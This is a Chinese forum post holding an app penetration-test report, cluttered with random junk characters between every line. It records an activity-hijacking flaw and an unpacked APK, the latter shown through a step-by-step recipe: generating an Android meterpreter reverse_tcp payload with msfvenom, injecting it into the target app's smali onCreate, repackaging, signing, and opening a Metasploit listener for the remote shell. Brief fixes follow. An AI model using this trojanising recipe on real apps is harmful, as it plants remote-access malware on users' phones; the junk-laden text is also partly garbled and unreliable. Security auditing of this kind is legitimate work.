! I( e! F; G6 |3 I# M" e$ c6 N: T 1 e. F! t" c1 r- g- Y

z- F# ?6 C" n r$ ` \- H( d ?$ T( V% J, r   ( _& t! ]; _" a# H0 q4 C1 { % G; t; X* q' h# a* k: q; K/ y

0 L) e6 V9 f* o, V- |: ] 9 l9 d% M# U0 ^

2 d2 s* a* n- \: [3 u& u3 d% V. d0 b/ |$ v3 X8 w9 }* `. n) G 2 检测结果                    9 e0 H1 o" [- g: Z: P/ e& F3 @; @$ F

1 J6 ~2 e W3 y' }3 } 8 ?5 [& w6 P& C* r" Z

m! S8 C# J' H- l; H6 k( P# I* Q4 ?8 O' X) Q 2.1 某某某 5 N: z" X8 A3 R/ u 6 a1 A, D" M: u. q5 m8 L/ }

6 q& I9 y& ?% n0 w* q9 a Q . q; N0 @! D% [# m& V, \2 D

' t7 I; r0 H. F 4 \# s$ u/ [/ A1 n. N 2.1.1检测目标 / y- F7 G1 T; e7 u! { ( V& j: G; U6 J# u( X9 M1 C

3 r1 s2 f1 Y1 `0 X, z + ?9 b7 G6 X: r3 L* z

" L% J! }3 O* x& c. l 9 @. s* f9 Z' c4 I* R/ n" x 目标地址: 某某某某某某APP - P) p/ [' G+ z( I- a( u$ M, v ?) l) N% e

5 K5 n, E2 y* `$ c/ f8 R- F$ K6 D) A! O! R+ v

+ p6 k% ]1 ] \. S 0 a$ s- V- U& c- O 2.1.2检测结果 # U; W1 i1 f0 j4 @7 W$ r8 D9 T $ A2 b& W: b5 h) p9 R, ~

5 A1 J# i* y" h% L/ c: N! l) v & f; E6 \6 m' t8 R' z$ O1 G s& J$ a

8 \" G d/ W( W( F3 W( W& Z4 V 2 m, v0 u4 D( z: ~0 M 2.1.2.1 $ @' j8 @" R7 S F : `- i$ p" f4 d Q' E

4 {3 W: h# z4 ^: m # L I" C( z6 ~$ C( L. T6 o! Q

- }7 J P) N0 V$ I. X. S : A: K3 t5 E' ?1 ]% i V 漏洞链接地址:某某某某某某APP * }' G+ f, i: m( k$ o- ~' z, h $ Q z j0 T$ m$ C( m

4 v2 J {+ U) v4 t% [* i3 |8 I2 u- _

, f/ H( U& i6 y. \$ N" f" r6 v " q0 Q9 }! K! e' n1 D+ _   - q: m7 E- a0 s: l 4 R9 B( p& w% Z" o+ m4 K5 n3 p$ @( [

+ o8 |2 t" Q7 S9 D) s8 j ' V9 p" I4 q6 v: v0 n

% U% G$ H) _2 ~! q- k- g6 ?: U; l: a, ?( D3 S- A( w& \7 C a3 L 漏洞分析及取证: + E1 o; M/ ^6 z0 [ : { s$ w& V4 ?4 b

. o) ]1 o( l' X# e3 [+ d+ N% V " L9 n+ Q/ v- F6 K( x2 a% F( B

, S @" }: J5 R 6 @- w* Z. Q; c                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: - `$ T A% c" q7 X& M 0 ^4 h& G! ~: o0 b

- ?- g7 q" ~: k$ K2 L' S" ~4 n$ H R# X+ u S9 N: P0 i

& N" o! I+ ~" N \; R( C# ? : b) Q; {9 }7 l& z- n ?4 D      9 h5 k; d8 g: J/ X# J2 B , Q6 k" |2 f1 i: P* z

8 B3 S! s8 M( T8 z * f1 q. r3 j" w# Q4 K1 ?5 O! M1 g

/ p1 @7 z, p' B7 Y" I% Z5 ?; }3 S( w1 ]- }( e9 [                       0 V5 v3 R: o) l7 u: K9 @8 W0 E6 g5 ~- b4 r% Z; U) X# |

# G9 s3 F% ~) i * e. J* s# V' ]# X. ~$ ^

/ @, C \( ]5 q, n3 k; I0 ^ ! ~( s1 h, G9 _8 X; q4 g / @" y7 t6 e9 @ . ?4 x v7 R5 [% X6 m

+ I/ u! H% r9 a: C$ p; M1 R+ C3 j0 L! E; `8 Q2 q! d7 ~$ V

' w! v( }0 Q) z9 D9 d " o" _3 N5 O# O0 t + J9 u0 O6 y- M5 ?- i " B; n* Q1 B& G

+ y0 F+ ^) e7 o; C& I : _3 t$ Y; B( {

& O) T: b' q9 H. |3 _ , ~" k- W3 C4 N4 u3 w! H! w : ^4 D7 D f* i' s . l1 E/ Y+ D8 T/ Y

9 i3 `1 u. G3 z2 |1 `$ X( e5 K$ Q% ?& e8 {

2 K, _4 G3 m& e N$ ^2 ~8 n # ^/ [6 p/ G' }3 s" O 漏洞危害:高 / N! @ x" n' n Z" N* ^+ y M, S4 M! r

$ x; ^, g: ?0 E7 b 8 k/ X; c4 D4 w3 O" n, n
! Y1 G8 B% C. h% J7 j2 k% E+ O: p, Z7 R4 R, q 6 _ w7 A8 J6 A. j% y- z _1 m% m1 G2 m2 R& N/ e2 [: [7 W/ g; z8 A7 n3 a3 M$ ]% _5 D9 o/ F8 ]' B3 j% \* n+ K+ ~* w+ f! D- a# g' X( s: p2 }7 u. R4 U! e2 p% t4 N% t8 w s3 O% s! ]" P* E8 |& ?6 B' D! V1 Z, L7 E- P( l6 D( i: J9 _% F3 j# G1 h+ [6 S; g7 o6 K$ u X s8 c# Z+ ~* b9 o3 P6 L T- E; b. M W5 L9 i' X+ n4 a, p" B5 o4 l9 Y0 N; W- _1 {+ s( \* B/ v# ~8 k$ Y0 W( e" y( E2 N' @ @& t/ _+ z2 E ]& J* u/ O! G/ {& f- l$ g m. r. d+ _* n! E! d$ J# S& q. p0 [3 C' H: y. z6 B+ Q$ ?: V8 T% W7 f4 L+ A% ~& J+ L# e; o0 g( U/ ^6 X6 J. f: r# s/ P9 O5 v% {7 h. Y1 P- }2 C4 j9 y2 { U5 G% q4 L! [' z
0 A( L& h" h) C4 Q- ~* S; A* y( |: T! G n% |: ~8 K% {

F4 P. m+ \1 Z9 A* } ! @! r" F% n: {$ \4 Z8 v 严重程度 7 ?! t4 S5 S0 h3 n ( F" d, a Z1 U* o( R

! a( k2 K- T. w7 W ; w" |0 b$ h5 c0 k 		/ o. y8 M: M) N 5 s( B- m7 O! I( E3 {6 L

! E& P7 ]- C2 G ' t9 ~! F' D( C, Q; c/ T F2 L / p0 D6 j; G5 @5 p0 |; \( P2 B( @1 ^3 l% O) }

7 {5 N b4 W4 {1 d- k" P' ]5 h I* K9 B$ q( i9 e1 `( N6 w 		* U. {/ ^7 _2 o. A ' M. J: \9 S% N5 F% E; G8 _

) V0 c8 X! n& l ]" V , y( R* V- N" p) q% @ 6 `. G$ Q" m% ` ! r1 M- B- R& _6 n0 `3 L7 R3 g% F/ ?

5 O. @- H, `5 l0 v {/ r5 r7 `9 s$ } 		: y9 Z. i: j6 \% R( d' c1 Q 8 s% ^, \2 h5 a

/ a9 P7 S3 G$ f. G" W 8 Z3 m. e& U3 ?3 ~3 ^, C& q ; s: }) t4 I2 `8 m2 L# W0 c$ g7 [7 z 4 o% w: U% i, D$ ^- N+ ^5 v

/ f; x3 Y- H+ u. ]5 q: l g4 u2 k 		. H" H, [3 ~2 Q! W7 q. K- c- w$ v$ i; P; i2 `! ~

3 K0 ~+ l4 B; u! w: v, M T" I6 W7 I/ B5 R% z   , _$ V( `4 w8 ]: C$ i & j0 \" {' J" n

3 d( V; U3 q% C ( m3 F. ]2 k$ o0 M6 |+ n 		% w4 _ ^3 o8 K3 |3 |# l % s( m9 I6 t `' M: e

m, t. |8 Q9 c. L ( A% t! e5 ^ E p9 R& S : [" {6 Y) \$ X1 k0 U4 i+ k& J 1 c" S- \1 s* Y1 f

, p5 l5 [, q) b' r, B2 v* Z! z% L3 } / c. d1 ^! ~2 H1 p% M 		4 `, Z6 d7 {- y* @ / s3 O% p" G6 u/ e

. k+ f2 g3 m% _/ O+ k : S# C: N$ M0 k9 q3 [   $ }# C) M! n: r, ] 3 u r/ Q4 u1 w4 {. }& }

; V$ g/ y; {7 m3 [ 0 q% e% O# G5 }$ N- v' s$ v0 e# N& j
0 e) ?0 U1 a5 P, W; U, x0 f, ^" g: v- M% h4 V
4 z9 ~5 R* h! N" ?: s 9 z5 T4 L, M- `' M5 n, Y3 Z

9 Y5 A! F* V' Y& ~& }. J, A' {4 A/ C- J* v& Q( _/ f! q   0 t) ~( z" B2 L/ b ! s# `( K4 Y/ h

& |. V/ ~: C) d5 _0 d. h3 `- }0 S4 \. u1 y

2 s% W. w W3 t X/ C/ E S4 Q* }- ? 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 ) A. B. }2 V5 F8 V5 j/ V $ g0 u# @# { S$ t

1 E4 b7 p' ? U7 e. K + N& |8 h9 N! m* I

( x4 \$ h7 Z6 m9 q: ?6 P& W6 `* N; v* M* Z( j5 {           " g c- }! K; ]/ l/ b" p+ S p7 N# f5 ?- R/ C% a6 ^

! u" g+ _: l, ~8 e [ " H n" c. @& B5 n l

; m- ^7 v. i, U " z' q$ h) p) `   5 F! ~/ k5 b% c- j |$ [$ I8 Q, y

N) G, q" Y5 j p. s + I P& g5 p* H; {' n

' H5 Z; l+ n+ r4 n& [ 5 r) w9 O2 g8 {; l 2.1.2.2 9 O7 V& j- l F# v. F( X* t: r / S7 Z) L' s1 E8 B

K3 P; r0 s- W- O9 I. i$ i * r1 `3 N4 Y+ Z

/ U1 m+ Y. @0 _9 B $ e# O% C# @# u. r 漏洞链接地址:某某某某某某APP ( W! M0 W( |! P2 y. Q) q( d V" z; x% b3 k* f; B" h

' X& w! j, Z0 I- \* J + }( j6 B$ ]8 Y8 A2 r

7 s8 q" m# a4 u n8 j4 k 4 Q3 k9 R8 f0 k, y3 t. I 漏洞分析及取证: " }7 {8 t" F4 | p( B/ w" {$ ?. @& H, U/ u# I

& S4 l9 @+ t, W8 g1 j# S( S. w; w. Q % t& a$ D% I- r* B5 x

! P- P$ g9 L6 D: B l: n; c( b2 N% e; t: n, w" Y/ e                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 9 ~/ \7 @8 H/ x: s/ }% N 6 e4 X( i. B* P4 v

7 _8 s y. ~, n- J9 h9 Y( C " W( o9 t0 Z! l* O

& I! I B- o- o @9 g8 f& }# B1 r* t' T# l) ]' [4 Q% @$ M Metasploit 生成木马 apk 8 P, {' V4 Q& W; A! F ( Q7 o/ M; \* H2 S4 q

X7 n: D$ p- t! i/ ^ + i1 l- g/ t6 a' J$ c

# ~9 _7 D# W) k$ O% M# [ $ }1 F/ _, ?! w& o& j3 t msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 2 P+ x# y$ V, H }% ?8 |" O; j% A" T

* ^" E/ q- S* ]* K7 l8 A0 a: }6 m3 K6 b2 a

6 f: A! Y' y* M . u* r% x9 @+ f5 p: Y3 _ 反编译目标apk和木马apk ' x; E$ ]2 E' A8 `' X4 a 6 h" \" R' c) w6 Y* P# H

7 N5 Y; i$ U$ r( q: X T% S 4 G' m: O7 M1 X* Y0 B+ w$ y( [

9 V+ }( @! O x W. h# U i# m 8 c7 c0 l1 M1 o0 `7 z+ e apktool d target.apk
1 H; Q" `# ?* k9 N3 c5 M, B" H7 k4 ^7 l apktool d cockhorse.apk ( {' N. k. _2 ~ 1 Y6 G* o/ C+ I( d. @9 K9 e: B

$ p! x' U8 {4 |2 u7 y % {: j- D P2 p J/ m; N

- e& Z1 f5 [- U9 S5 Q % P- t2 M. e6 _) K3 E$ r 木马 apk 注入目标 apk , v, \! T% ~+ Y# k, F- C. n 5 g) r( p2 p* R! X7 ~

& z& e8 l! R8 L+ E8 `3 f. V ) T& N% b$ K7 S! ^0 o

' J" b8 g8 ~. z% M: k: k$ h7 t# L8 Q6 O+ B2 o. `. U# v 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
. e% ^/ ]2 I& X* d4 G0 ?; D3 e! ~( d. ]! _9 {6 l! A invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V 4 ^; h: X, q% O- i) c0 H2 j' X7 D8 P# R " v$ z4 h6 q1 M6 h. E; Z# v5 R @% y

5 p! u2 a' ?& E" I ! N" X% Z0 ]2 V2 J! t2 s% Y9 q

0 x ?2 Z3 a* V* r6 q6 j5 m- [1 `# {4 P, | 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 ( ~ {" _$ e# K, D1 M$ m: ~: ]4 d- r" r9 W, `0 X

: C' @& i! v% C& F; l 1 _+ l7 p3 m- M2 _% W

1 Q7 u/ }0 W; l; B# L " r0 M! x2 @: x 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ 3 }% n+ W; ]- B . ^; M6 G& V7 R( {: m

1 j B1 E( Z9 D1 l; u # `! L" x0 t! U9 h# o5 m; e. q

& N+ j% U/ D, w; B- H / `) q, l$ W4 l 回编译生成最终 apk 1 j" q7 S( Q- B, T( u0 z9 v - }& d. R0 S" J; ~& L

$ O" p5 H! }2 o9 m% z # y% G' P4 B2 C7 a1 g

1 l' ~# b) U- p: B' r9 T6 k: V! h9 v2 F' @6 I1 m* X3 b( k3 V 重新打包 4 X2 [3 W; K# c8 o | ' @) @7 W4 X k2 j

1 d9 ~) r2 N3 W) d4 L5 h5 r+ x ; K: r( y8 j/ t' G) {2 c0 k5 i

# l# L( ]8 c: n" N4 I, g 4 b# `( J6 \# y apktool b -o repackage.apk target_app_floder + V# [6 W2 y2 O+ W0 _3 Y4 i; b7 |: K# \9 I

# h2 L6 I3 a9 W5 O + q* Q ?$ Y1 W" P* x7 z$ r {

# H+ Y! R+ q, |) @3 V+ x . x! Y+ h! \7 F' j; Y 创建签名文件,有的话可忽略此步骤 ' R: ~7 ?- K$ x5 } }2 O ! ]+ \9 h% p" `

X2 e% i f x, _! c3 x* h 1 x1 p: P) U+ ?1 ]# ^. K

& H: S* `4 r5 m0 [8 R, u4 W9 `* B0 X+ |0 d2 N keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                - y) @- s3 D& L$ j# G 2 V0 d$ e! o( t7 v/ `: M

g! p+ `/ @/ X6 ]1 f1 E+ @ / z+ ^6 W! {$ P

b5 v; M. l2 g6 N; a1 E 2 _; C) d8 r7 n 签名,以下任选其一 / i4 x3 Y6 Q8 M 8 G$ A. b: T3 p2 L

+ O7 }% J1 @! ]1 u: k' N( D) d% E2 R4 G8 @% g3 v" F& ?

U, ~3 T2 G$ N& E$ ?6 ]- O- I/ P: |5 q$ C; `% A& t( n" ]7 _/ } jarsigner 方式 ) A, ?2 @; N) v! U 5 W0 {- @ D7 S: Q

& C! y( V" c( [9 z8 \* u( i) } 8 ^2 f: c' Q6 @

; A/ G: F/ ^. g8 o' d7 I & C) P- T, k7 {3 s( s jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname " f0 d+ O: h5 u ; i$ X2 g* v+ y

+ x- y- S3 d" \2 }; o- L: ]! i/ h/ O& u0 n

5 w. S0 H0 A3 N5 k- X+ b$ W 3 w' P4 B6 `9 T8 P, Y( g$ T O3 d apksigner 方式 r* Z& s* `7 U; o1 K7 ] ( {# Z4 \- J5 \* P

k3 \: i4 H& b+ m( d 3 s% j# g, f- Z/ o g$ \' W

& F( P. F) N: s- Q: ]* o! I 2 [9 c$ r' B6 n; g! G( H$ x* v apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk - J2 l/ ]9 \' }" m$ e t' d6 @" ^3 [8 S8 r# A' Y9 |

. B6 E* y6 }5 y0 }4 { $ w' i! ]8 f! s D- ?( Y: b8 W

, u' {! {* [( j& e5 u- c3 V( X( l2 w0 y- Q) t 如需要禁用 v2签名 添加选项--v2-signing-enabled false : b* c" E( J- ]4 W0 B) D1 o3 l6 j

+ }6 \' F) B# l$ A2 H* j% |& w4 d; u0 I8 }

v: ?6 A9 U( Z3 k2 E ; m7 r5 e5 R$ i* X( h7 K3 U 验证,以下任选其一 9 F) k: n, s$ ^; q; W; ~5 |$ w 3 C4 J* W; ^& ^* T, ^

# }0 S, ]1 u# P2 q) @, ? - H5 b, u$ X5 F

, W, n/ J* e5 M2 J5 ` T* ^- c$ I" D) I) b1 i jarsigner方式 ! I2 O9 z1 |0 D0 z% Y- { " z' }" c! J' m5 r: y0 x/ \

3 ^! a5 R/ H# u! d2 `3 G8 P2 k N( z! C$ x

6 Y- Z/ w. n p: E0 q* J 5 ^9 b0 }/ ^; X1 J jarsigner -verify repackaged.apk # O2 `; u* F* b" X. [% x* _% u3 y4 Z, H: s& @

& U6 [- ?( \7 g 6 Y/ G) U; Z' O9 V1 g+ C

4 ?1 {* f W8 I5 Z/ }* _8 r. E * ^& W# u! v, H apksigner 方式 + }% `0 A% ?) W9 Z& a. F' T& R 3 Q8 M( H6 b0 U- x; n! F

7 e2 Q6 x7 V$ r* r8 {, D 1 j# M! M9 O" l: R' I) R' b2 C; K

7 a1 e% y6 d8 Z0 `- z, B 2 S, o" B1 o9 A, A. D! U apksigner verify -v --print-certs repackaged.apk 6 K0 z( }/ @! g. F1 A 7 q0 |5 [2 } t* N1 _

+ H7 i. o8 O3 o - Y+ @: g' A) M9 Q

6 h ? l4 x/ T* N , s' P+ E* `8 q7 L keytool方式 1 R& ~: k6 H; C8 Y, h6 c" l6 F D$ q8 S/ A [$ a- C

2 | @3 l! y4 K$ n! m1 \2 e% c# O 1 J" k& Y; Z. c1 }; @+ ]

2 u, X3 W* _6 B% v; M: |+ w5 t U/ v" G7 ]0 j$ U! x keytool -printcert -jarfile repackaged.apk 8 g I# I, G0 i# [( m. J, i + b2 h: i+ J4 y

8 I9 l2 h! U+ M( e. @ $ p; H' m1 s6 f! P$ ?' y2 ^' Y

) X' H, H+ {& K/ Q% H2 ^, c; P; ~- p$ W- }0 E8 B, Q* ] 对齐 ; {$ O2 g+ C5 o! E, M3 v4 U( Q ; P* u* R4 f) i% I

7 Y7 i9 s% w3 u, N$ T; Q& c ; F0 M6 _! t6 K; @& Y4 G, \

: b- V+ D! r |2 i4 J G/ y" H5 i4 _( u" U' q# s! f3 j* S 字节对齐优化 0 ]; ]% ?' }( J8 ^ 7 q5 Q; { w: d* {3 m

- P& f* ^+ f$ M9 t# u 9 v7 @8 c9 ~0 E7 n, Z, h7 b

/ M9 i1 f, s2 S$ N- i* b / q* l1 ]2 ]: V( Y zipalign -v 4 repackaged.apk final.apk : q7 `, m, ]4 o+ z) d, l) B, y6 G% x( w; F# D' h6 z

6 N# y- X6 a, Y2 V + q0 y* J$ N5 O) k" ]$ a

" ~+ ~; J0 w% T Z1 A( w1 H 0 l" [9 w! Z. z5 {( d 检查是否对齐 % C: H4 Y( A2 L- ]5 E% c 2 n# k# t' x! i7 d7 {) m: f

1 K) X1 @2 V0 ?' p 6 i3 u" }. K& z0 Z3 ~3 c

: s9 f; I: ?( b# a) x: R 0 K4 y: J. N. _3 z5 X zipalign -c -v 4 final.apk . u. B: }. `' K2 V7 t4 S# H$ I( }6 r. t0 Z+ T1 `7 m

- J, ~2 |/ ^4 h" N! t S( H- ] 8 ?. f& n: n! {- \) ?& l

4 D0 L0 a) g" s# z( c9 ~/ x/ S # ?% _5 A* w" e 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 + o+ O% s: @4 k* m/ K9 q: j# G, u 5 n. `9 e: x) Z. n3 b2 C

# w7 R, d$ b2 G+ c2 E3 W 1 v" e; u& P4 ?' g: L

; C* ^1 o: w; p3 B" W4 e 5 L( C/ d2 }7 S7 D* F 启动Metasploit控制台,配置参数等待上线 2 R5 c$ \* {7 s/ [) [& {, l # [. Y! i6 K$ [- _+ b! d, B& O

6 A# @# P w3 h" `% y2 |% x l! h4 ]/ c& Z; R( n9 R+ n. ]

, `8 n8 K7 x5 t4 G! p4 a0 n ' R p3 f9 D9 f7 \! Z% I 在终端依次输入如下命令 7 X0 W1 L8 |- w3 W A* k/ ] 8 m" o8 c4 q6 {8 O. j

4 h. _/ D7 N, a }( N5 } _8 E 1 a S- Z2 G6 e& C

# J6 p l$ |1 O) f # z n$ E/ ]# I5 {' B. y' i msfconsole 2 x" O: \3 L4 I, H2 o9 ?- [! v3 d0 A/ U& r1 `' {

6 @5 Z- z& d* b) H ( D6 j9 B6 U W" X

$ k- \6 M i1 G( c- P 6 x+ g4 S/ a% C. E' Z& R% m use exploit/multi/handler 3 N3 ~( i" c) T% x! j: ` 8 O8 Q& J& @7 x

8 m5 N. d3 @% I( S3 s) ? " N1 y" G" A/ }/ a* t7 A2 [: C) c

/ h5 u2 a# Z+ p/ I$ [2 l" w6 A3 `5 C 4 V A2 z7 Y4 y& Y set PAYLOAD android/meterpreter/reverse_tcp 4 J* p4 B" x$ n : d; M- ]3 w$ ?; k

; k; K- D) @% t" } . A G, K$ R3 R2 ^8 B& F G

' u- }& F: i9 G' J& K 0 s$ w, U3 K! C9 K5 } set LHOST 192.xxx.xx.xx 0 |. E# @9 F3 y# j" k3 v; b . d2 e o/ t' t6 n: |5 a1 C

$ [& X) p* I/ j0 z- ^! I, Q0 M/ o ' x- S3 }$ Z. I

& n0 `7 l; X) f" G * u4 o' [" U0 E% }* \4 d! ^ set LPORT 4444 8 |: } I+ O* Z" T* l ; T/ w8 O- f2 p8 y' t2 l( _

1 x" v2 L* `( _' E3 v/ I; c- J ' y, D9 e6 I! t w9 F2 s

+ y% `6 G: {; `/ Q8 V U$ ~3 a; V5 K- K8 S% ?6 Y exploit * [$ x2 f) ~ t. F d9 I# y2 h5 J, c3 B

# ]" E" u+ f9 ^* c$ E4 M- z% X1 W+ y1 e# B; `( A- p

+ r- e: E K K+ U+ V4 R- \9 r 0 b+ b$ |! h" |6 V4 y 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               ) u m$ X" c/ y+ c + J" s2 _* c# V( f8 d1 A

% S& I; {! e' ?- D- C m 9 g( |; t3 [1 r) l$ s3 f7 d

$ ?7 e# \7 `; N" \$ w" z; p) G) p$ k # S) H1 J% V0 @ 漏洞危害:中 ( \# S \; J A0 s$ c ' \2 I% I: W; C! y' l# L

& ?! d' v; e, V0 R# e3 A- r " g5 X; G8 w) |( R$ a
3 ?# y6 X2 \) d7 D0 X$ g3 e 9 w$ k! R. `9 t7 A7 V- X) \' ~1 B * `4 O+ A( @. X# h4 W6 H ( }4 ~ O6 w* H6 J# ?0 B / ?! c# w1 y8 F6 @1 [& ?: A) F( a% y3 X# {' x- f; D. d: S- l$ _! k4 K e. }4 {$ T8 ?' h( m9 p- `1 _2 _ _, e& b! Z2 V' Q6 f8 @3 b; d- p0 X- Q0 O. Q6 M2 ^, v W7 y' q& y3 u `8 c% `7 _8 S% b6 Q3 E/ r5 r5 z3 ^" y6 Q6 b% ]) B0 i& h, v6 G0 n7 R; j" @! E) i* O2 {5 F8 e1 m. G- c1 O- Z, P2 B2 n* M4 |) w# ^. l* A0 U" C0 Z# }1 x! a5 Y, I9 t, `+ ?0 B* W5 _- S: t8 o+ C6 x4 |+ z. }' K7 c4 J1 w/ a; ]2 |1 ~: \+ Q4 r8 U6 V+ j* M2 a3 O+ [. P. T8 C0 A- j: O" C# a! W* _4 O! B: T2 l) D. U& V# u9 J+ d6 J" L3 `* i/ g: j7 l" w E% l5 c$ h3 A! G. r" c- ^
) Y3 a4 U Y/ [+ C1 P: N % W: ?; A7 l2 o9 I/ s& r

; q7 |: Y) @- Q, J5 r3 X2 H% { # H V$ b( Z4 j0 b5 D c 严重程度 ( {* X( W9 x4 ?4 Q# K! f4 ]( T : `1 o' \- u9 s, f6 v

% P' @6 M! l& C/ s7 f& m7 p" s ' R( N- P- y6 i7 c 		& ]; Z2 {3 \# J: Y# P+ ]! I & R5 `8 p! |" |3 G% u7 s4 }) q( P

9 X y! z7 P7 X( W2 x l P, S % s o e/ `9 M : c, P: b' Y, O$ K 1 x6 C5 n* M+ t' p

- ]9 ~4 Z8 ]' `% } 7 a6 i9 Q! m! a! l. O7 e 		6 n1 b8 {( h" H 4 R0 I/ b. U# g& k8 H. c" Z

+ R6 I/ |+ f) E# O- e" _3 k) h$ [5 l+ U2 w! r4 ~+ z # T# x5 A1 u0 Y( v k3 {4 M7 ^- S4 U; N5 z: B, n Q

4 P4 q2 v9 R& `$ f/ |4 V 9 L) E; w- U# M* M6 G 		( e" n3 E+ s6 e1 E; t % P5 Q/ \6 `2 q0 a ?4 _/ s

. d0 f2 W- X) [ o+ b $ R4 A" _/ t; O$ U$ J : b7 N& b# X/ r' B# F# t1 p- b ( p3 C; e; k+ E/ }7 l |

, i9 A3 K* g1 y8 W9 Q, K4 w* o+ J' c _ 		# q9 Y0 b' v- @+ n% `; K- H1 T0 ?6 |/ u$ U2 _+ G % ` _0 z. l, F* }+ q5 k! ] 0 y: y5 ^. ~( X2 u1 y3 Z1 g( }

6 v2 A! w$ Q, ~. `4 i& L* ?7 |8 B- F1 g$ F+ c" I   ! X/ @* a; n* `) D7 X% \ ( x2 M/ s; N/ j4 n

. ]: j* K) R( n9 u' H8 N $ I5 a) @7 R, X# O" w 		0 Y( x3 ?& h9 o) }4 w' Q* T3 k

g8 J0 ~: G y1 {# q+ c# [ 9 F, M$ M: U |, x6 B) j3 Y ( m2 E5 m2 p% G- F3 N' l # S: X: r5 N `, x

( g t% F. N1 ]+ r$ F" a3 d! a 5 w7 p* q3 c1 C- r 		" T3 W/ `! a& c. r' @1 v# R7 L$ r , S3 O# x3 y( v) p' E- q2 A 5 S s' z' ~/ D1 P7 c8 T& H3 O) m: R7 ]4 j8 I6 l

3 s8 ^. n: y# H2 l: F) U- W3 ]& q) n, C Y% L7 |0 K   4 m1 L* T! U; W' F$ Y" X2 o6 g2 n# W" c: G: Z

/ _7 u- H2 T) Y5 x- h, z% G- J : |9 q" o$ W7 f) T
2 Y, r- b- s- R, s: q2 X/ Z # e- K; e1 \! i
( d/ F- l' ~8 |5 p( C8 m Y3 v! B! m) ~4 p* Q% B

0 o1 L0 m& d9 L8 {1 I 8 y* a+ x) e; u: }5 N   + ?8 V/ E7 K9 v/ m* U8 J ! _4 `- B# G& _

7 n+ A4 R$ e0 a5 n ) _4 l# [6 e- [/ @ V

% v% Q4 Z4 {) e g- Q* W9 r 4 g ~7 F% Q, N5 f& Z0 Q! T 修复方法: + h* H# z2 `" ]2 K1 y8 {7 A: q9 N! \" U" ?" U" [

0 ?2 V; U: b: | * Z7 W/ n0 `' K2 @) n: c4 q* y

& A P1 _6 _9 {0 C - v% c' L! _% l4 z4 m               1. APP 启动时应做签名校验防止二次打包。
& f |! T5 [9 X- Q + y8 k1 J( `* ~* |) S5 N( x- f 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ( J1 J* w6 m' Z4 [8 X( q" }0 a8 |% ~9 x5 X

7 f1 ?) t9 }: Y 4 O$ z( F* i- y, f % h% U( d+ a1 e5 O 8 k7 c" j- L9 G% L6 T

( @0 A9 j7 [ L* d0 i1 v2 ]' n+ |: i- z8 q   - J; l, g1 |# d& d E6 I 6 l; H n+ b, p7 s& z \

+ k6 @$ I; ]. {+ K1 t6 ^2 { " R& G8 |, w1 h& q6 ] * |- J% h% J' j' i9 | ' K: p. c1 @: f. o) k2 j! c; z

( z0 U K' D# n1 [ O* U- u7 [5 e3 d
* o5 }5 e- `* _ 1 w1 |1 U; h& [; F( U

' f% n' a% J% F& r& h 8 u8 O* A4 c' z* M
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表